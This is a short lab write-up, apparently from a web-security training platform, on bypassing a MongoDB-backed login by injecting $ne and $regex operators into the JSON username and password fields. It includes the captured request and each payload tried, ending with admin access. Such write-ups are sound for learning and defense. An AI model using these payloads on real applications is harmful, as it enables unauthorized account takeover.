Exploiting NoSQL operator injection to bypass authentication

Description

The login functionality for this lab is powered by a MongoDB NoSQL database. It is vulnerable to NoSQL injection using MongoDB operators.

To solve the lab, log into the application as the administrator user.

You can log in to your own account using the following credentials: wiener:peter.

Approach

Upon accessing the lab, I immediately directed my attention to the login functionality, with the FoxyProxy extension activated to inspect requests in Burp Suite.

POST /login HTTP/1.1
Host: 0a0000fc0495cce780e60da300f900a2.web-security-academy.net
Cookie: session=UGXlwn8f1Ydb421CKDNks8RWZC0fjzGl
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
...

{"username":"wiener","password":"peter"}

I sent the POST /login request to repeater to begin experimenting with payloads. Starting with the provided credentials wiener:peter, I attempted to identify any vulnerabilities in the authentication mechanism. First, I tried setting the username to wiener and used the $ne parameter to bypass the password check:

{
	"username":"wiener",
	"password":{
		"$ne":""
	}
}

This payload successfully granted access. Next, I attempted to change the username to administrator:

{
	"username":"administrator",
	"password":{
		"$ne":""
	}
}

However, this attempt failed, indicating that administrator was not the correct username. To leverage regex to match the administrator's username, I first tested the approach with the wiener user:

{
	"username": {"$regex":"wien.*"},
	"password":{
		"$ne":""
	}
}

This successfully logged me in, confirming that the regex wien.* matched wiener. Encouraged by this success, I applied the regex to the administrator user:

{
	"username": {"$regex":"admin.*"},
	"password":{
		"$ne":""
	}
}

And just like that, I gained access, confirming that the administrator username begins with the string admin. With that, I successfully solved the lab.